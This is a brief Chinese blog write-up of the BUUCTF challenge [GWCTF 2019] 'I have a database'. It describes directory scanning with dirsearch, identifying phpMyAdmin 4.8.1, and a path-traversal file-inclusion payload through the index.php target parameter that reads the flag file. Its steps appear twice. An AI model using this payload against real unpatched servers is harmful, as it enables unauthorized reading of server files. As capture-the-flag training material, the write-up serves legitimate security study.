Xxiaoma解题 [GWCTF 2019]我有一个数据库
![Xxiaoma解题 [GWCTF 2019]我有一个数据库](https://img2024.cnblogs.com/blog/3552001/202411/3552001-20241105155218522-2034061559.png)
BUUCTF,[GWCTF 2019]我有一个数据库,解题。
OXO1 打开题目看到
0X02 用kali工具dirsearch扫描后发现有以下网站
0X03 依次查看
0X04 构造payload
发现版本为4.8.1,网上搜一下后发现该版本存在框架代码漏洞可以利用
构造payload为:phpmyadmin/index.php?target=db_datadict.php?../../../../../../../../flag
OXO1 打开题目看到
0X02 用kali工具dirsearch扫描后发现有以下网站
0X03 依次查看
0X04 构造payload
发现版本为4.8.1,网上搜一下后发现该版本存在框架代码漏洞可以利用
构造payload为:phpmyadmin/index.php?target=db_datadict.php?../../../../../../../../flag
浙公网安备 33010602011771号